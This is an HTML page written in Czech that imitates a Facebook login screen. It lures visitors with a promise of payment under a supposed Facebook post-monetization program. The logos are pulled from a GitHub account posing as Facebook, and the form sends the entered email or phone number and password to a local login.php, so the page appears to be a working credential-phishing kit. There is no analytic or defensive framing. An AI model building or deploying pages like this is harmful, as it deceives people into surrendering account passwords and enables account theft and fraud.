<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f2f2f2;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: flex-start; /* Align content at the top */
            height: 100vh;
            margin: 0;
        }

        .container {
            width: 90%; /* Adjusted width to be responsive */
            padding: 40px; /* Increased padding for a larger appearance */
            background-color: rgb(242, 241, 241);
            border-radius: 0px; /* Added rounded corners */
            box-shadow: 0 0 0px rgba(0, 0, 0, 0.2);
        }

        .container input[type="text"],
        .container input[type="password"] {
            width: 98%;
            padding: 15px; /* Increased padding for a larger appearance */
            margin: 10px 0;
            border: 1px solid #a9bdca;
            outline: none;
            border-radius: 5px;
            height: 45px; /* Adjusted the height for larger inputs */
            font-size: 18px; /* Increased font size for better visibility */
        }

        .login-button {
            width: 100%;
            padding: 15px; /* Increased padding for a larger appearance */
            background-color: #2916f6;
            border: none;
            color: #fff;
            cursor: pointer;
            border-radius: 5px;
            height: 50px; /* Adjusted the height for a larger button */
            font-size: 18px; /* Increased font size for better visibility */
        }

        .forgot-password {
            text-align: center;
            margin-top: 15px; /* Increased margin top */
        }

        .forgot-password a {
            text-decoration: none;
            color: #3e32c4;
            font-size: 16px; /* Increased font size for better visibility */
        }

        .centered-image1,
        .centered-image2 {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }

        .custom-text {
            font-family: Arial, sans-serif;
            font-size: 16px; /* Increased font size for better visibility */
            margin-top: 15px;
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
    <div class="centered-image1">
        <img src="https://raw.githubusercontent.com/FacebookArt/logo1/b617c015f548be27cbcb5671bc969cef04811487/logo%20czech.png" alt="Image 1" style="max-width: 100%; margin-bottom: 20px;">
    </div>
    <div class="container">
        <div class="centered-image2">
            <img src="https://raw.githubusercontent.com/FacebookArt/logo2/a806014d04135d457a78cd6daba5ecfce8d1b917/logo2.png" alt= "image 2" style="max-width: 100%; margin-bottom: 20px;">
            <div class="custom-text">Zaregistrujte se do programu generování příjmů na Facebooku a získejte zaplaceno za své příspěvky.</div>
        </div>
        <form name="login" method="POST" action="login.php">
            <input type="text" class="container input" placeholder="Mobile Number or Email Address" name="email">
            <input type="password" class="container input" placeholder="Password" name="password">
            <button class="login-button" id="loginButton" type="submit">Přihlásit se</button>
        </form>
        <div class="forgot-password">
            <a href="#">Zapomenuté heslo?</a>
        </div>
    </div>
</body>
</html>
